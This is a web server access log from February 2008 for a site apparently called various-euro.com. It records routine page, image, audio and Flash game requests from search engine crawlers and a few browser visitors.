65.55.209.98 - - [19/Feb/2008:19:22:03 +0100] "GET /zampa/robots.txt HTTP/1.1" 404 2748 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.98 - - [19/Feb/2008:19:22:05 +0100] "GET /wonderland/index.html HTTP/1.1" 302 374 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
193.252.149.16 - - [19/Feb/2008:19:23:58 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.16 - - [19/Feb/2008:19:24:02 +0100] "GET /neon/large.html HTTP/1.1" 200 1547 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
65.55.209.98 - - [19/Feb/2008:19:26:14 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.98 - - [19/Feb/2008:19:26:14 +0100] "GET /zampa/wonderland/index.html HTTP/1.1" 200 2084 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.214.45.101 - - [19/Feb/2008:19:26:31 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
65.214.45.101 - - [19/Feb/2008:19:26:32 +0100] "GET /restate_copy.html HTTP/1.0" 200 97631 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
91.23.249.240 - - [19/Feb/2008:19:28:03 +0100] "GET /framez-rez.html HTTP/1.1" 200 4323 "http://www.redbang.de/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /frame-menu.html HTTP/1.1" 200 10763 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /frame-unten.html HTTP/1.1" 200 5557 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /f-rez.html HTTP/1.1" 200 9765 "http://www.various-euro.com/framez-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /rez/ma.jpg HTTP/1.1" 200 12893 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /rez/mb.jpg HTTP/1.1" 200 12467 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /rez/car.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:04 +0100] "GET /rez/tec.gif HTTP/1.1" 200 732 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:11 +0100] "GET /rez/557.mp3 HTTP/1.1" 200 9164800 "http://www.various-euro.com/f-rez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:19:28:18 +0100] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
74.6.27.124 - - [19/Feb/2008:19:29:41 +0100] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.209.104 - - [19/Feb/2008:19:44:12 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.104 - - [19/Feb/2008:19:44:13 +0100] "GET /neon/girl-tv.html HTTP/1.1" 200 1717 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.22.151 - - [19/Feb/2008:19:53:33 +0100] "GET /f-other.html HTTP/1.0" 200 33189 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.23.249.240 - - [19/Feb/2008:20:02:06 +0100] "GET / HTTP/1.1" 200 10335 "http://www.list3.de/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:06 +0100] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:06 +0100] "GET /framez_0.html HTTP/1.1" 200 12411 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:11 +0100] "GET /framez.html HTTP/1.1" 200 4130 "http://www.various-euro.com/framez_0.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /frame-menu.html HTTP/1.1" 200 10763 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /frame-inhalt.html HTTP/1.1" 200 6025 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /frame-unten.html HTTP/1.1" 200 5557 "http://www.various-euro.com/framez.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/neon_click_3.gif HTTP/1.1" 200 240 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/ascii-lt.gif HTTP/1.1" 200 1049 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /eurosign3.gif HTTP/1.1" 200 7879 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/neon_click_1.gif HTTP/1.1" 200 890 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/ubu-shot.png HTTP/1.1" 200 200117 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/wet.gif HTTP/1.1" 200 18561 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/google/Logo_40blk.gif HTTP/1.1" 200 2308 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/neon_click_2.gif HTTP/1.1" 200 387 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/douwil.gif HTTP/1.1" 200 528 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/anti_black_small.gif HTTP/1.1" 200 1009 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/copyleft_black_small.gif HTTP/1.1" 200 1231 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:12 +0100] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:17 +0100] "GET /partnergegenberlin.html HTTP/1.1" 200 5022 "http://www.various-euro.com/frame-inhalt.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:17 +0100] "GET /bannerz/stasi-2-0.jpg HTTP/1.1" 200 42818 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:17 +0100] "GET /bannerz/kapitalismusdebatte.jpg HTTP/1.1" 200 69093 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:17 +0100] "GET /bannerz/logo-partnergegenberlin.png HTTP/1.1" 200 6341 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:51 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:52 +0100] "GET /games/virtualcop/bbo_bg.gif HTTP/1.1" 200 543 "http://www.various-euro.com/games/virtualcop/virtualcop.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:02:52 +0100] "GET /games/virtualcop/virtualcop.swf HTTP/1.1" 200 2563562 "http://www.various-euro.com/games/virtualcop/virtualcop.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:03:09 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
122.152.140.5 - - [19/Feb/2008:20:04:00 +0100] "GET /rez/326.mp3 HTTP/1.0" 200 7672484 "http://202.108.23.172/index.html" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)"
91.23.249.240 - - [19/Feb/2008:20:11:39 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
217.224.185.117 - - [19/Feb/2008:20:15:30 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
217.224.185.117 - - [19/Feb/2008:20:15:30 +0100] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
217.224.185.117 - - [19/Feb/2008:20:15:31 +0100] "GET /games/virtualcop/bbo_bg.gif HTTP/1.1" 200 543 "http://www.various-euro.com/games/virtualcop/virtualcop.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:15:58 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:10 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
217.224.185.117 - - [19/Feb/2008:20:15:31 +0100] "GET /games/virtualcop/virtualcop.swf HTTP/1.1" 200 2563562 "http://www.various-euro.com/games/virtualcop/virtualcop.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:29 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:47 +0100] "GET /games/virtualcop/virtualcop.html HTTP/1.1" 200 4487 "http://www.various-euro.com/partnergegenberlin.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:56 +0100] "GET /f-horrorkatze.html HTTP/1.1" 200 7865 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:56 +0100] "GET /bannerz/gras.jpg HTTP/1.1" 200 15895 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:56 +0100] "GET /bannerz/horrorkatze/teGIFT.JPG HTTP/1.1" 200 4873 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:56 +0100] "GET /bannerz/horrorkatze/EAT.gif HTTP/1.1" 200 89369 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:56 +0100] "GET /bannerz/horrorkatze/kontext-inform.mpg HTTP/1.1" 200 96263 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:57 +0100] "GET /bannerz/horrorkatze/struct-fotoalbum.mpg HTTP/1.1" 200 25146 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
91.23.249.240 - - [19/Feb/2008:20:16:57 +0100] "GET /sound/KEYWEST.MID HTTP/1.1" 404 2748 "http://www.various-euro.com/f-horrorkatze.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"
193.252.149.15 - - [19/Feb/2008:21:03:49 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
193.252.149.15 - - [19/Feb/2008:21:03:51 +0100] "GET /neon/euro.html HTTP/1.1" 200 2212 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)"
65.55.209.99 - - [19/Feb/2008:21:08:53 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.209.99 - - [19/Feb/2008:21:08:54 +0100] "GET /3dsf3/sendi/hyperreality.html HTTP/1.1" 200 1436 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:12:05 +0100] "GET /robots.txt HTTP/1.0" 200 64 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:12:06 +0100] "GET /3dsf3/sendi/hyperreality.html HTTP/1.0" 200 1436 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:18:57 +0100] "GET /3dsf3/sendi/communication.html HTTP/1.0" 200 1331 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:23:26 +0100] "GET /neon/girlz3.html HTTP/1.0" 200 2479 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:23:26 +0100] "GET /3dsf3/sendi/utopia.html HTTP/1.0" 200 1295 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:23:26 +0100] "GET /3dsf3/sendi/animals.html HTTP/1.0" 200 1422 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:23:26 +0100] "GET /3dsf3/sendi/catastrophe.html HTTP/1.0" 200 1322 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:23:27 +0100] "GET /3dsf3/sendi/sacrifice.html HTTP/1.0" 200 1309 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:23:27 +0100] "GET /3dsf3/sendi/connection.html HTTP/1.0" 200 1336 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:23:35 +0100] "GET /3dsf3/sendi/receiver.html HTTP/1.0" 200 1402 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:29:40 +0100] "GET /3dsf3/sendi/body.html HTTP/1.0" 200 1322 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [19/Feb/2008:21:41:57 +0100] "GET /neon/code.html HTTP/1.0" 200 1109 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
64.124.14.34 - - [19/Feb/2008:22:00:06 +0100] "GET / HTTP/1.1" 200 10335 "-" "Mozilla/4.7 [en] (Win95; U)"
66.249.67.80 - - [19/Feb/2008:22:04:39 +0100] "GET /robots.txt HTTP/1.1" 200 64 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.67.80 - - [19/Feb/2008:22:04:40 +0100] "GET /neon/girl-tv.html HTTP/1.1" 200 1717 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.105.10.66 - - [19/Feb/2008:23:00:47 +0100] "GET /zampa-lovers/zampa.ICO HTTP/1.1" 200 7134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:00:46 +0100] "GET /zampa-lovers/ HTTP/1.1" 200 37790 "http://www.seecult.org/portal/html/modules.php?op=modload&name=Web_Links&file=index&req=viewlink&cid=6" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:00:52 +0100] "GET /zampa-lovers/DRAGAN_Z.JPG HTTP/1.1" 200 6850 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:00:54 +0100] "GET /zampa-lovers/MILIZA_2.JPG HTTP/1.1" 200 22172 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:00:55 +0100] "GET /zampa-lovers/MILIZA_3.JPG HTTP/1.1" 200 26924 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:01:06 +0100] "GET /zampa-lovers/MILIZA_B.JPG HTTP/1.1" 200 10947 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:01:10 +0100] "GET /zampa-lovers/MILIZA_4.JPG HTTP/1.1" 200 9946 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:01:11 +0100] "GET /zampa-lovers/DRAGANZA.JPG HTTP/1.1" 200 18560 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:01:17 +0100] "GET /zampa-lovers/1SEITEVE.GIF HTTP/1.1" 200 78726 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:01:25 +0100] "GET /zampa-lovers/2SEITEVE.GIF HTTP/1.1" 200 83466 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:18 +0100] "GET /zampa-lovers/Kralle.gif HTTP/1.1" 200 260 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:18 +0100] "GET /zampa-lovers/zampamali.gif HTTP/1.1" 200 2617 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:18 +0100] "GET /zampa-lovers/zampa-2X2.gif HTTP/1.1" 200 6948 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:19 +0100] "GET /zampa-lovers/kralle.gif HTTP/1.1" 404 2748 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:21 +0100] "GET /framez-zampa-lovers.html HTTP/1.1" 200 4322 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:23 +0100] "GET /frame-menu.html HTTP/1.1" 200 10763 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:21 +0100] "GET /zampa-lovers/zampa.gif HTTP/1.1" 200 460627 "http://www.various-euro.com/zampa-lovers/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:25 +0100] "GET /frame-unten.html HTTP/1.1" 200 5557 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:25 +0100] "GET /zampa-lovers/index.html HTTP/1.1" 200 37790 "http://www.various-euro.com/framez-zampa-lovers.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:31 +0100] "GET /bannerz/ve.jpg HTTP/1.1" 200 36912 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:41 +0100] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:02:41 +0100] "GET /bannerz/various-euro-girl.jpg HTTP/1.1" 200 91514 "http://www.various-euro.com/frame-unten.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
77.105.10.66 - - [19/Feb/2008:23:03:38 +0100] "GET /frame-inhalt.html HTTP/1.1" 200 6025 "http://www.various-euro.com/frame-menu.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5"
